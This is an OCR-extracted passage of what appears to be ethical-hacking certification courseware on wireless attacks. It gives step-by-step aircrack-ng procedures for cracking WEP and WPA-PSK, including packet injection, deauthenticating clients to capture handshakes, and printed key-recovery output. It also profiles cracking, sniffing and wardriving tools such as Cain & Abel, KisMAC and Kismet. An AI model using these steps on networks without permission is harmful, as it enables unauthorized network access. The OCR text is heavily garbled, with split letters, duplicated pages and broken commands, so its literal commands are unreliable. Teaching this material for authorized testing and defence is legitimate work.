Opening capture.ivs Read 75168 packets. Aircrack-ng 0.7 rl3 0 [00:00:10] Tested 77 keys (got 684002 IVs) KB depth byte(vote) 0 0 /1 AE( 199) 29( 27) 2D( 13) 7C( 12) FE( 12) FF( 6) 39( 5) 2C( 3) 00( 0) 08( 0) 1 0 / 3 66( 41) F I( 33) 4C( 23) 00( 19) 9F( 19) C7( 18) 64( 9) 7A( 9) 7B( 9) F6( 9) 2 0 /2 5C( 89) 52( 60) E3( 22) 10( 20) F3( 18) 8B( 15) 8E( 15) 14( 13) D2( 11) 47( 10) 3 0 /1 FD( 375) 81( 40) ID ( 26) 99( 26) D2( 23) 33( 20) 2C( 19) 05( 17) 0B( 17) 35( 17) KEY FOUND! [ AE:66:5C:FD:24 ]
j
^ ................................................... .................
S te p 5: W a it for airodump-ng to capture more than 50,000 IVs Crack W E P key using aircrack-ng.
How to Crack WEP Using A ircrack Screenshot 2/2

Step 4: Inject the packet using aireplay-ng to generate traffic on the target access point. ijgg Command Prompt
C:\>aireplay-ng -3 -b le:6 4 :5 1 :3 b :ff:3 e -h a7:71:fe:8e:d8:25 e t h l
22:30:15 Waiting for beacon frame (BSSID: 1E:64:51:3B:FF:3E)
Saving ARP requests in replay_arp-0219-123051.cap You should also start airodump-ng to capture replies Read 11978 packets (got 7193 ARP requests), sent 3902 packets...
FIGURE 15.62: Generating traffic on the target access point using aireplay-ng
Step 5: Wait for airodump-ng to capture more than 50,000 IVs Crack WEP key using aircrack-ng.
Module 15 Page 2309
Command Prompt
C:\>aircrack-ng -s cap ture.ivs Opening capture.ivs Read 75168 packets. Aircrack-ng 0.7 rl30 [00:00:10] Tested 77 keys (got 684002 IVs) KB depth byte(vote) 0 0/1 AE( 199) 29( 27) 2D( 13) 7C( 12) FE( 12) FF( 6) 39( 5) 2C( 3) 00( 0) 08( 0) 10/3 66( 41) F I( 33) 4C( 23) 00( 19) 9F( 19) C7( 18) 64( 9) 7A( 9) 7B( 9) F6( 9) 2 0/2 5C( 89) 52( 60) E3{ 22) 10( 20) F3( 18) 8 B( 15) 8 E{ 15) 14( 13) D2( 11) 47( 10) 3 0/1 FD( 375) 81( 40) ID ( 26) 99( 26) D2( 23) 33( 20) 2C( 19) 05( 17) OB( 17) 35( 17) KEY FOUND! [ AE:66:5C:FD:24 ]
FIGURE 15.63: Capturing 50,000 IVs Crack WEP key using aircrack-ng
Module 15 Page 2310
How to Crack WPA-PSK Using Aircrack

S te p 1
S te p 2
Collect wireless traffic data with airodump-ng
C :\>airodump-ng ethlr --write capture
Monitor wireless traffic with airmon-ng

C :\>airmon-ng start ethl
02S Command Prompt

C:\>airmon ng s tart ethl C:\>airodump-ng BSSID 02:24:2B:CD:68:EF 02:24:2B:CD:68:EE 00:14:6C: 95: 6C: FC 1E:64:51:3B:FF:3E -write capture ethl PWR RXQ Beacons #Data, # / s 99 5 60 3 0 99 9 75 2 0 99 0 15 0 0 157 1 0 76 70 CH 1 5 9 11 MB 54e 54e 54e 54e ENC CIPHER AUTH ESSID OPN IAMROGER WPA TKIP PSK COMPANYZONE WEP WEP HOME WEP WEP SECRET_SSID
BSSID S t a t i o n PWR 1E :64 : 5 1 : 3 B : F F : 3 E 00:17:9A:C3:CF:C2 1 1 E : 6 4 : 5 1 :3 B:F F:3 E 00:1F:5B:BA:A7:CD 76
Rate L o s t Packets Probes 1-0 0 1 le-54 0 6
How to Crack WPA-PSK Using Aircrack

WPA-PSK is an authentication mechanism in which users provide some form of credentials for authentication of a network. Encryption mechanisms used for WPA and WPAPSK are same, but the only difference between these two is authentication is reduced to a simple common password in WPA-PSK. The preshared key (PSK) mode of WPA is considered vulnerable to the same risks as any other share password system. This WPA-PSK can be cracked using the Aircrack tool. The following are the steps to crack WPA with Aircrack: Step 1: Monitor wireless traffic with airmon-ng C : \>airmon-ng s t a r t e th l Step 2: Collect wireless traffic data with airodump-ng C : \>airodump-ng --w rite capture e t h lr
Module 15 Page 2311
Command Prom pt
C:\>airmon-ng
Beacons 60 75 15 157 PW R -1 76 #Data, #/s 3 2 0 1 Rate 1-0 le 54 0 0 0 0 CH 1 5 9 11 Lost 0 0 MB 54e 54e 54e 54e ENC OPN WPA W EP W EP TKIP W EP W EP Probes PSK CIPHER AUTH ESSID IAMROGER COMPANYZONE I HOME SECRET SSID
start ethl
PW R 99 99 99 76 Station 00:17:9A:C3:CF:C2 00:1F:5B:BA:A7:CD RXQ 5 9 0 70
c:\>airodump-ng -write capture ethl

BSSID 02:24:2B:CD:68:EF 02:24:2B:CD:68:EE 00:14:6C:95:6C:FC 1E:64:51:3B:FF:3E BSSID 1E:64:51:3B:FF:3E 1E:64:51:3B:FF:3E
Packets 1 6
FIGURE 15.64: Collecting wireless traffic data using airodump-ng
Module 15 Page 2312
How to Crack WPA-PSK Using Aircrack (C on t)!

Command Prompt
C: \>airepl ayng -deauth 11 a02:24:2B:CD:68:EE
CEH
Step 3 : De-authenticate (deauth) the client using Aireplay-ng. The client will try to authenticate with AP which will lead to airodump capturing an authentication packet (WPA handshake)
Step 4 : Run the capture file through aircrack-ng m Command Prompt
H
WPA < 1 handshako
c:\ > a i r c r a c k n g . e x ea2 w capture.cap

Opening capture.cap Read 607 packets BSSIS ESSID Encryption 102:24:2B:CD:68:EE COMPANYZONE Choosing first network as target. Opening ../capture.cap Peading packets, please wait...
Aircrack-ng 0.7 rl30 [00:00:03) 230 keys tested (73.41 k/s) KEY FOUNDI[ passkey] Master Key : CD D7 9A 5A CF B0 70 C7 E9 D1 02 3B 87 02 85 D6 39 E4 30 B3 2F 31AA 37 AC 82 5A 55 B5 55 24 EE Transdent Key : 33 55 0B FC 4F 24 84 F4 9A 38 B3 D O 89 83 D2 49 73 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08 AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97 D9 6F 76 5B 8C D3 DF 13 2F BC DA 6A 6E D9 62 CD EAPOL HMAC : 52 27 B8 3F 73 7C 45 AO 05 97 69 5C 30 78 60 BD
Copyright by EG-CtUIICil. All Rights R eserved. Reproduction is Strictly Prohibited.
How to Crack WPA-PSK Using A ircrack (Contd)

Step 3: Deauthenticate (deauth) the client using Aireplay-ng. The client will try to authenticate with AP, which will lead to airodump capturing an authentication packet (WPA handshake).
FIGURE 15.65: Deauthenticating (deauth) the client using Aireplay-ng
Step 4: Run the capture file through aircrack-ng.
Module 15 Page 2313
Command Prompt
c : \>aircrack-ng.exe-a 2 -w capture.cap
Opening capture.cap Read 607 packets
# BSSIS ESSID Encryption
W P A <1 h a n d s h a k e s 1 0 2 :2 4 : 2 B : C D : 6 8 :E E C0M PA N Y20N E
C h o o s in g f ir s t n e t w o r k a s t a r g e t . O p e n in g ../ c a p tu r e .c a p P e a d in g p a c k e ts , p le a s e w a it ...
Aircrack-ngO.7 rl30 [00:00:03] 230 keys tested (73.41k/s) KEY FOUND! [passkey] M aster Key : CD D7 9A 5A CF BO 70 C7 E9 D1 02 3B 87 02 85 D6 39 E4 30 B3 2F 31 AA 37 AC 82 5A 55 B5 55 24 EE Transcient Key : 33 55 0B FC 4F 24 84 F4 9A 38 B3 DO 89 83 D2 49 73 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08 AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97 D9 6F 76 5B 8C D3 DF 13 2F BC D A6A 6E D9 62 CD EAPOL HMAC : 52 27 B8 3F 73 7C 45 AO 05 97 69 5C 30 78 60 BD
FIGURE 15.66: Running the capture file through aircrack-ng
Module 15 Page 2314
WPA Cracking Tool: KisMAC

1 Delete Test Injection Jo in Network Show Details x< a 1 XT XX J 1
CEH
, KisM AC 0.3.3
N e tg e a rIn c . 2 0 X 2 0 7 1 01 14 22 8( 2 0 1 2 0 7 1 02 1 :3 6 :3 3h1 C h a n n e l M a m C h a n n e l s S u p p o r te dR a t e s 1 .2 .5 .5 .1 1 .1 8 .2 4 .3 6 .5 S * g n a l M a * S ig n a l A v g S ig n a l T y p e 1 E n c r y p tio n R a c k e ts 4 4 1 0 6 1 D a taP a c k e ts 3 7 5 S 0 3 M a n a g e m e n tP a c k 6 5 5 5 C o n tr o lP a c k e ts 0 U n iq u eIV s 2 5 3 7 9 1 In j.P a c k e ts 1 0 0 y te s 5 67 3 M .S K e y < u n r e s o lv e d > A S C II K e y < u n r e s o lv e d > la s tiv 0 00 00 0 N oE le v a tio nD a ta
Monitor Signal Strength Monitor all signals Deauthenticate
A XM
OS8D
Deauthenticate all Networks Authentication Flood Reinject Packets unknown Crack
e < v .B y te s IPA d d r e s s L a s tS e e n 5 g n a l s e n tB y te s r 2 2 8 8u n k n o w n 2 2 8 8u n k n o w n 1 9 0 8u n k n o w n 2 2 8 8u n k n o w n 2 6 6 8u n k n o w n 1 9 0 8u n k n o w n 2 6 6 8u n k n o w n 2 6 6 8u n k n o w n 2 6 6 8u n k n o w n 2 6 6 8u n k n o w n 1 S 2 8u n k n o w n 1 9 0 8u n k n o w n 0 0
against LEAP Key against W PA Key against 40-bit Apple Key against 104-bit Apple Key against 104-bit MD5 Key
KzzxLzzmm
Weak Scheduling Attack
!unknown
Bruteforce
0 0 unknown 0 0 unknown 0 0 unknown 0 0 unknown 0 0 unknown__________ 0_________ 0
l You can crack/brute force WEP and WPA passwords using KisMAC l KisMAC runs on MAC OS X
2 6 6 8u n k n o w n ?7 8 8u n k n o w n
Ji
Start Scan
h ttp://trac. kismac-ng. org

Copyright b y iC - C 0 H C il. All Rights Reserved. Reproduction is Strictly Prohibited.
WPA C racking Tool: K isM AC

Source: http://trac.kismac-ng.orR KisMAC is a sniffer/scanner application for Mac OS X. It uses monitor mode and passive scanning. It supports many third-party USB devices such as Intersil Prism2, Ralin rt2570, rt73, and Realtek rtl8187 chipsets. All of the internal AirPort hardware is supported for scanning. A few KisMAC features include: 9 9 Q Q 9 Reveals hidden / cloaked / closed SSIDs Shows logged in clients (with MAC addresses, IP addresses, and signal strengths) Mapping and GPS support Can draw area maps of network coverage PCAP import and export
Q Support for 802.llb /g 9 9 9 9 Different attacks against encrypted networks Deauthentication attacks AppleScript-able Kismet drone support (capture from a Kismet drone)
Module 15 Page 2315
f |
Dlete Test Injection
X 1 1 XT XX) 1
S S ID B S S JD S e tg e a rIn c . firs tSw r 2 0 1 2 0 7 1 01 14 22 8( , L a s tS e e n C h a n n e l M a m C h a n n e l , S u p p o rte dR a te s S o n a l M a x S < g n a J AvgSignal m a n a g e d T y p e

Encryption
WEP
* n Property
1 Join Network Show Details Monitor Signal Strength Monitor all signals
~XM
0XD Deauthenticate Deauthenticate all Networks Authentication Flood Reinject Packets
ig n a l s e n tB y te s r e c v .B y te s IPA d d re s s V e n d o r S 2 2 8 6u n k n o w n u n k n o w n 0 8 0 u n k n o w n O B 2 2 8 6u n k n o w n 0 u n k n o w n 1 9 0 8u n k n o w n 0 0 6 u n k n o w n 2 2 8 8u n k n o w n 0 0 8 2 6 6 8u n k n o w n u n k n o w n O B 0 u n k n o w n 1 9 0 8u n k n o w n 0 0 6 u n k n o w n 2 6 6 6u n k n o w n 0 0 8 u n k n o w n 2 6 6 8u n k n o w n 0 0 6 u n k n o w n 2 6 6 8u n k n o w n 0 0 8 u n k n o w n 2 6 6 8u n k n o w n 0 0 8 u n k n o w n 1 5 2 6u n k n o w n 0 0 8 u n k n o w n 0 6 1 9 0 8u n k n o w n 0
Weak Scheduling Attack Bruteforce against 40-bit Apple Key against 104-bit Apple Key against 104-bit MD5 Key
4 4 1 0 6 1 P a c k e ts 3 7 S 5 0 3 D a taP a c k e ts M a n a g e m e n tP a c k !6 S 5 S 8 C o n tro lP a c k e ts 0 2 5 3 7 9 1 U m q u eiv s 1 0 0 In j. P a c k e ts B y te s 5 67 3 M i8 < u n r e s o v e d > K e y < u n r e s 0 < v e d > A S C II K e y 0 0 0 0 0 0 L a s tfV N oE le v a tio nD a ta
2 6 6 8u n k n o w n 2 6 6 8u n k n o w n 6 2 4 8u n k n o w n 2 2 8 8u n k n o w n 1 5 2 8u n k n o w n 2 6 6 8u n k n o w n 1 9 0 8u n k n o w n 2 2 8 8u n k n o w n 2 6 6 8u n k n o w n 2 6 6 8u n k n o w n 2 6 6 8u n k n o w n 2 6 6 8u n k n o w n 2 6 6 8u n k n o w n ..? 7 JB B .u n k n o w n
Start Scan 9
FIGURE 15.67: KisMAC screenshot
Module 15 Page 2316
WEP C racking Using Cain & Abel
CEH
UrtfW< ItlMul NM kM
W EPK/s 1702528 Korek's Attacks W A_u15 W A_s13 A_u13_1 K3 W A_u13_2 W A_u13_3 W A_s5_1 F
Fudge Factor
- Last KB Brute-Focce---z i | last key byte r r ate

bci
| 2
A_s5_2 W A_s5_3 W A_u5_1 (v o te ) 2 7 7 )4 7 ( 2 8 0 )8B( 2 4 9 )5 8 ( 2 3 5 )4 7 ( 196 ) B E ( 3 1 4 )3 E( 18b) 8 E( 272 )5B( 1 1 0 )1 8 ( 6 8 4 )6 4 ( 2 8 0 )2 D ( 326 )7B(
W E P Cracker utility in Cain implem ents statistical cracking and P T W cracking m ethods for the recovery of a W E P Key
W A_u5_2 W A_u5_3 W A_u5_4
W A_s3 W A_4_:13 W A_4_u5_1
P F
s s 7 3 9 13
0 1 2 1
3
1 1
D e p th / / / / / / / / / / / /
0 0 0 0 0 0 0 0 0 0 0 0
1 1 1 1 1 1 1 1 1 1 1 1 1
B y te C( F( S3( 61( C( E( 65( 74( bB( 65( 79( 30(
6 6
6 6
1 3 )2 1 ( 2 7 )1 3 ( 1 5 )8 6 ( 2 8 )B 8 ( 2 4 )9 9 ( 4 5 )4 1 ( 2 7 )C 9 ( 3 9 )3 1 ( 2 6 )B 2 ( 2 4 )D4( 3 0 )0 1 ( 8 1 ) O E(
1 2 )9 7 ( 2 4 )C C ( 1 5 )2 8 2 8 )3 6 ( 1 5 )6 8 2 8 )D 2 ( 2 5 ) 5A ( 8 )C C ( 1 5 )0 6 ( 1 5 )E B ( 3 0 )3 1 ( 4 1 )1 C (
1 2 )0 5 ( 1 5 )9 C ( 1 5 )9 F ( 2 4 )0 1 ( 1 3 ) 8D( 2 4 )1 8 ( 1 5 )7 D ( 25)0 B ( 1 5 )6 1 ( 1 5 )1 2 ( 2 8 )7 7 ( 3 9 )A 5 (
0 )F 0 ( 1 2 )9 D ( 1 2 )3 9 ( 1 5 )D O ( 1 3 )5 7 ( 1 5 )4 0 ( 1 3 )E 3 ( 1 5 )E C ( 1 S )4 D ( 1 5 )F 6 ( 2 4 )F 0 ( 2 8 )1 9 (
UEP Key
fo u n d
A S C I I : l o c o I n c > tkoy0 3 H sx 6 C 6 F6 3 6 1 6 C 6 E 6 5 7 4 6 B 6 5 7 9 3 0 3 0
http://www.oxid.it
Copyright b y IG -C O H C il. All Rights Reserved. Reproduction is Strictly Prohibited.
I ^ j WEP C racking Using Cain & Abel

1
*
Source: http://www.oxid.it
Cain & Abel is a password recovery tool for Microsoft operating systems. The WEP Cracker utility in Cain implements statistical cracking and the PTW cracking method for the recovery of a W EP key. This tool even allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted passwords using dictionary, brute-force and cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords, and analyzing routing protocols. The latest version includes a new feature, APR (ARP Poison Routing), which enables sniffing on switched LANs and man-in-the-middle attacks. The sniffer in this version can also analyze encrypted protocols such as SSH-1 and HTTPS, and contains filters to capture credentials from a wide range of authentication mechanisms.
Module 15 Page 2317
Korek's W EP A ttack
K ey s tested 50 \ I/C IV/. W LP r IVs 1702528 Korek's A tta ck s 17 A _u 1 5 17 A _s 1 3 17 A u13 1 17 A _u 1 3 _2 ( 7 A _u 1 3 _3 [ 7 A_s5 _1 (7 A _s5_2 17 A _ s 5 _ 3 F A u5 1 |7 A _u 5 _2 17 A _ u 5 _ 3 F A u5 4 [7 A _s3 17 A _4 _s 1 3 I? A 4 u5 1 17 A _ 4 _ u 5 _ 2 17 A _ n e g W E P K e y Length 1128 bits Fu d ge Factor [2 d 2 ] Initial part 01 the k ey (Hex)
*I 1
1 I'D L W INO O IW C T U ILC | last k ey byte IIalfa-numeric keys only B C D hex digits only
KB 0 1 2 3 4 5 6 7 8 9 10 11
Depth 0/ 0/ 0/
0/
0 0 0 0 0 0 0 0 / / / / / / / /
1 1 1 1 1 1 1 1 1 1 1 1 !
Byte 6C( 6F ( 63( 61( 6C( 6E( 65( 74( 6B( 65( 79( 30(
(vote) 277)47( 2 8 0 ) 8B( 249)58( 235)47( 196)B5( 3 1 4 ) 3E( 1 8 6 ) 8E( 2 7 2 ) 5B( 110)18( 684)64( 280)2D( 3 2 6 ) 7B(
13)21( 27)13( 15)86( 28)B8( 24)99( 45)41( 27)C9( 39)31( 26)B2( 2 4 )D4( 30)01( 8 1 ) 0E(
12)97( 2 4 )CC( 15)28( 28)36( 15)68( 28)D2( 2 5 ) 5A( 2 8 )CC( 15)06( 1 5 )EB( 30)31( 41)1C(
12)05( 1 5 ) 9C( 1 5 ) 9F( 24)01( 1 3 ) 8D( 24)18( 1 5 ) 7D( 2 5 ) 0B( 15)61( 15)12( 28)77( 39)A5(
0 )F0 ( 1 2 )9D( 12)39( 1 5 )DO( 13)57( 15)40( 13)E3( 1 5 )EC( 1 5 ) 4D( 15)F6( 24)F0( 28)19(
0) 8) 0) 15) 12) 15) 13) 13) 13) 15) 15) 24)
1 o c a 1 n e t k e y 0
WEP K e y
found
ASCII: l o c a l n e t k e y 00 Hex: 6C6F63616C6E65746B65793030
Start
Exit
FIGURE 15.68: Screenshot showing WEP Cracking Using Cain & Abel
P TW WEP A ttack
C r a c k in g WEP H e *: K ey 128 fo u n d b i t ! k e y ( d o n e )
x]
A S C I I :
lo c a ln e tk e y O O
6 C 6 F 6 3 6 1 6 C 6 E 6 5 7 4 6 B 6 5 7 9 3 0 3 0 s to p p e d .
A t t a c k
Start
Cancel
FIGURE 15.69: Recovering WEP key using PTW cracking method
Module 15 Page 2318
WPA Brute Forcing Using Cain & Abel

\ Source: http://www.oxid.it Cain can recover passwords by sniffing the wireless network and crack WPA-PSK encrypted passwords using dictionary and brute-force attacks. Its new version also ships routing protocols, authentication monitors and routes extractors, dictionary and brute-force crackers for all common hashing algorithms and for several specific authentications, password/hash calculators, cryptanalysis attacks, password decoders, and some not so common utilities related to network and system security.
Module 15 Page 2319
WPA Cracking Tool: Elcomsoft W ireless Security Auditor

W* k W " O ftiW S Cette pc jW Hflp A Cfn prqec! * j project H i Start attack Pause atiack & Check lot updates 9 Help corterts
CEH
Elcom soft W ireless Security Auditor allows netw ork administrators to audit accessible w ireless netw orks
Inptit Si-
irtonjnes loal: rrtto p ^ Cvcn: speed p sw rt
1 Or Od 0tc0-rcA6\ ITS 72*) aagiectopu
OKtonann left: Tne left: Average % > e e3 : Proccjsorload: en#6t1<x 3%
a Oy Od O h Jlm Jls 123 706 S7*to
It com es w ith a built-in w ireless ne tw o rk sniffer (with AirPcap adapters)
It tests the strength of W PA /W P A 2 - PSK passwords protecting your wireless network

Chann* 6 10 11 11 11 6 1 BSE t f V f l P m m m tm m m m warn m m mm mm m u mm m m m m m M M |n 1 E H 1 Beacons 352 37 254 257 129 0 Data 1116 56 0 0 0 0 0 Ptxm 56 76 -63 -66 75 -70 78 76 S**d 54 46 54 54 54 1 46 46 Snaypton W PA WPA OPEN WEP or Vfi>A VJP v W PA W EP or W PA W EP O fW PA
2 2
http://www.elcom soft.com
Copyright b y iC - C 0 H C il. All Rights Reserved. Reproduction is Strictly Prohibited.
, WPA C racking Tool: Elcomsoft W ireless Security Auditor

Source: http://www.elcomsoft.com Elcomsoft Wireless Security Auditor allows you to verify the security of a company's wireless network by executing an audit of accessible wireless networks. It comes with a built-in wireless network sniffer (with AirPcap adapters). It attempts to recover the original WPA/WPA2-PSK text passwords in order to test how secure your wireless environment is.
Elcomsoft Wireless Security Audito^B
FJe Action Options Help
Import d a t a
a C r e a t e p r o j e c t
ti
Cpen p r o j e c t Save p r o j e c t
ti
S t a r t a t t a c k
/ Pause a t t a c k
9
Check f o r updates
o Help c ont ent s
O c D o r v a n e st o t a l : T i m ee l a p s e d : CuTent s p e e d : l a s tp a s s w o r d :
Oy Od
0 M > m :4 6 t
17S 779 o n g ic r io p u
Octonanesl e f t : Tme l e f t : Average s p e e d : P r o c e s s o rt o a d :

er>S*sK<Jc - 3 %
O yO d
O h Jl m ; ) U
123 708
57H ,
Module 15 Page 2320
W ireless listener is in progress
_____
Access Points
Use Selected
C w cd
FIGURE 15.70: Elcomsoft Wireless Security Auditor screenshot
Module 15 Page 2321
WEP/WPA Cracking Tools

o h ttp :/ / w e p a t t a c k .s o u r c e f o r g e .n e t
WepAttack
C.il.fwd
c EH
tt*H4i Nath*
(f)
h t t p :/ / w w w .s e c p o in t.c o m
Portable Penetrator
h ttp :/ / w w w .a ir c r a c k n g .o r g
Wesside-ng
h tt p s :/ / w w w .c lo u d c r a c k e r .c o m
CloudCracker
h ttp :/ / w w w .a ir c r a c k n g .o r g
Aircrack-ng
h t t p :/ / w ir e le s s d e fe n c e .o r g
coWPAtty
h ttp :/ / w e p c r a c k .s o u r c e f o r g e .n e t
WEPCrack
h t t p :/ / c o d e ,g o o g le ,c o m
Wifite
h t t p :/ / w e p d e c r y p t .s o u r c e f o r g e .n e t
WepDecrypt
h ttp :/ / w w w .p ts e c u r ity .r u
WepOff
W EP/W PA Cracking Tools

WEP/WPA cracking tools are used for breaking 802.11 WEP secret keys. These tools recover a 40-bit, 104-bit, 256-bit, or 512-bit W EP key once enough data packets have been captured. A few tools guess WEP keys based on an active dictionary attack, key generator, distributed network attack, etc. The following are a few WEP/WPA Cracking tools used by attackers: 9 9 9 9 9 9 9 9 9 9 WepAttack available at http://wepattack.sourceforge.net Wesside-ng available at http://www.aircrack-ng.org Aircrack-ng available at http://www.aircrack-ng.org WEPCrack available at http://wepcrack.sourceforge.net WepDecrypt available at http://wepdecrvpt.sourceforge.net Portable Penetrator available at http://www.secpoint.com CloudCracker available at https://www.cloudcracker.com coWPAtty available at http://wirelessdefence.org Wifite available at http://code.google.com WepOff available at http://www.ptsecuritv.ru
Module 15 Page 2322
Module Flow
C EH
So far, we have discussed various wireless concepts, wireless encryption, threats, and hacking methodology. Now we will discuss wireless hacking tools. Wireless hacking can also be performed with the help of tools. The wireless hacking tools make the attacker's job easy. This section covers various Wi-Fi sniffers, wardriving tools, RF monitoring tools, Wi-Fi traffic analyzers, etc.
JT
M odule Flow
Wireless Concepts
t < /*
Wireless Encryption
Wireless Threats
| ||||Wireless Hacking Methodology
^
^
V
Bluetooth Hacking
Countermeasure
0
Wi-Fi Pen Testing
Module 15 Page 2323
Wi-Fi Sniffer: K ism et

J It is an 802.11 Layer2 w ireless ne tw o rk detector, sniffer, and intrusion d etection system J It identifies n etw orks by passively collecting packets and detecting standard nam ed netw orks J It detects hidden n etw orks and presence of nonbeaconing n etw orks via data traffic
K ism t S ort Viw Windows Nm BSSID TC TRBCnet 00:14:01:5 f :97:12 A 0 linksys_SES_45997 0 0 :16:86:18:E4:FF A 0 la n d sc a p e s linfcsys Autogroup Probe TFS eskas Xu Chen TK421 Eline-PC-W ireless P ickles 00:14 BF:07:2f 4 0 0 :1A:70:0 9 :K : 13 00 1F.90:E6 EO 84 00 1F 90FA.F4 Cl 00:13 E8:9 2 :3FC8 00:09 56:07 :90 82 00 18:01:F5 65E1 00:18:01:F9:70:F0 00:18:01:F E 6 8 7 7 00:24 B 2 0 E E 6 E 2 00 IF 90 E4 04 F1 00:1F:33:F3:C5:4A AN AN AW AM P N AN A0 AN A0 A cf AW j A0 1 2417 6 2447 6 2437 6 2437 11 2462 2412 ............. 11 2462 11 2462 6 2442 6 2442 Pkts Si 1 08 2 08 08 08 4 S 08 08 9 08 10 08 13 08 17 OB 19 OB 23 OB ............. ............. ............. ............. ............. ............. ............. ............. ............. ............. .............
(rtifwtf
CEH
itfciul Nm Im
2 Bcnft S i C lnt Manuf Ctv SMn 1 Tr*nd*arI wlanO .............

1 Cisco-Link - - - wlanO 1 1 1 1 1 1 1 1 1 C sco-Link Cisco-Link A ctlortecE ActiontacE IntolCorpo Ntgar ActiontocE ActiontccE ActiontocE
lanO wlanO --lanO wlanO lanO US lanO US *lanO lanO wlanO lanO
I I
N oG P Sin fo (G P Sn o tc o n n o c to d )
No ip d a t f r o GPSO in 15 seconds or or, a ttM p tin g to rocormoct No ip d a t fro GPSD in 1S soconds or ore. a ttM p tin g to roconnoct
: Could not comoc t t o th spoctools srvr lo c a lh o s t:30569 : No updat fro GPSO in 15 soconds or oro. a ttM p tin g to roconnoct No updat fro GPSO in 15 soconds or or. a ttM p tin g to roconnoct
http://www.kismetwireless.net
Copyright @ b y EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.
W i-Fi Sniffer: Kism et

Source: http://www.kismetwireless.net Kismet is an 802.11 Iayer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card that supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, 802.lln , and 802.l l g traffic (devices and drivers permitting). It identifies networks by passively collecting packets and detecting standard named networks, detecting (and given time, decloaking) hidden networks, and inferring the presence of nonbeaconing networks via data traffic.
Module 15 Page 2324
K is M t S o rt View Windows TRENDnet lin k jy s SES 4 5 9 9 7 OQf 9 3 landscape! lin k sy s MPA4 1 6 S I0 3 Autogroup Probe TFS meskas Xu Chen 1 X4 2 1 Elina-PC -W ireless
7 J4 R 0
P ic k le s
00: 1 4 : 01 :5 F : 97:12 A 0 12417 00: 1 6 : 86 :1 B :E 4 :FF A 0 6 2 4 4 7 00: I F :9 0 F2 CD:C2 A W 12412 00: 1 4 :B F : 07 :2 F :8 4AN 6 2 4 3 7 00: 1 A : 70 : 09 :BC :1 3AN 6 2 4 3 7 00: 1 F : 90 :E 6:E 0:84 A W 112462 0 0 IF 9 0 FA.F 4 C8 A M --- 2 4 1 2 00: 1 3 : E8: 92 :3 F:C 8 P N .............. 00: 09:58 07: 90:82 A N 1 12 4 6 2 00: 1 8 : 01 :F 5: 65 :E 1 A 0 1 12 4 6 2 00: 1 8 : 01 :F 9: 70 :FO A N 62442 00: 18:01: F E : 68:77 A 0 6 2 4 4 2 00: 24: B2: OE: E6: E2 A 0 * o n fi j r e 00: IF 9 0 E6. 04F 1 A W Naae 00: 1 F : 33 : F3 :C5: 4 A A 02 E Z 00: 16CE 07: 60:77 A W [ W E PU an u fI
C ) Lock Channels E
3S 59 3 A
1 2 4 5
S $
0 6 0 8
OB OB OB Ot
0 8 0 6 0 6 0 6 0 6 0 8
K
- -
... ...
...
... ... ...
1 0 1 3 1 7 1 9 2 3
---*
... ... ...
--A ctio n tecE US 1 Cisco-Link 1 Cisco-Lin k 1 A ctio n tecE 1 A ctio n tecE 1 IntelC orp o * ... 1 Netgear 1 A ctio n tecE US 1 A ctio n tecE US 1 A ctio n tecE
1 Trendwarel 1 Cisco-Link
Charnel Chan
( Cancel ]
[ Change ]
No GPS in fo (GPS not connected) E 25: N 0uPdate [ g g E : No update r g g S : Could not No update [S 2 S i: N 0update f ron GPSD fron GPSD connect to fro GPSD fro GPSD in 1 5 seconds or ore, attem pting to reconnect in 1 5 seconds or ore, attem pting to reconnect the spectools server lo c a lh o s t :3 0 5 6 9 in 1 5 seconds or ore, attem pting to reconnect in 1 5 seconds or ore, a tte a p tin g to reconnect
FIGURE 15.71: Kismet screenshot
Module 15 Page 2325
h t t p :/ / a ir c r a c k n g .o r g
airbase-ng
h t t p :/ / w w w .m a c s t u m b le r .c o m
MacStumbler
h t t p :/ / w w w .m o n 0lith 8 1. d e
ApSniff
h ttp :/ / w w w .th r e e ja c k s ,c o m
WiFi-Where
h t t p :/ / w w w .a s p e c t o s o f t w a r e .c o m
WiFiFoFum
h ttp :/ / a ir fa r t .s o u r c e fo r g e .n e t
AirFart
h ttp :/ / w w w .n e t s t u m b le r .c o m
MiniStumbler
AirTraf
h ttp :/ / a ir tr a f.s o u r c e fo r g e .n e t
h t t p :/ / s o u r c e fo r g e .n e t
WarLinux
h t t p :/ / w a v e la n t o o ls .s o u r c e f o r g e .n e t
802.11 Network Discovery Tools
k- W ardriving Tools
Wardriving tools enable users to list all access points broadcasting beacon signals at their location. It helps users to set new access points, making sure there are no interfering APs. These tools even verify the network setup, find the locations with poor coverage in the WLAN, and detect other networks that may be causing interference. They detect unauthorized "rogue" access points in your workplace: 9 airbase-ng available at http://aircrack-ng.org 9 ApSniff available at http://www.monolith81.de 9 WiFiFoFum available at http://www.aspecto-software.com 9 MiniStumbler available at http://www.netstumbler.com 9 WarLinux available at http://sourceforge.net 9 MacStumbler available at http://www.macstumbler.com 9 WiFi-Where available at http://www.threejacks.com 9 AirFart available at http://airtraf.sourceforge.net 9 AirTraf available at http://airtraf.sourceforge.net 9 802.11 Network Discovery Tools available at http://wavelan-tools.sourceforge.net
Module 15 Page 2326
RF M onitoring Tools
h ttp :/ / p r o je c t s .g n o m e ,o r g
NetworkManager
CEH
h ttp :/ / w w w .w a v e n o d e .c o m
WaveNode
h t t p :/ / k w ifim a n a g e r .s o u r c e f o r g e .n e t
KWiFiManager
h t t p :/ / x o s v ie w .s o u r c e f o r g e .n e t
xosview
h ttp :/ / w w w .a r a c h n o id .c o m
NetworkControl
h tt p :/ / w w w .n e w s t e o .c o m
RF Monitor
h t t p :/ / k o r in o c o .s o u r c e f o r g e .n e t
KOrinoco
h t t p :/ / w w w .d e k t e c .c o m
DTC-340 RFXpert
h ttp :/ / w w w .t e k .c o m
Sentry Edge II
I PI
*
h t t p :/ / s o lu t io n s .3 m .c o m
Home Curfew RF Monitoring System
RF M onitoring Tools
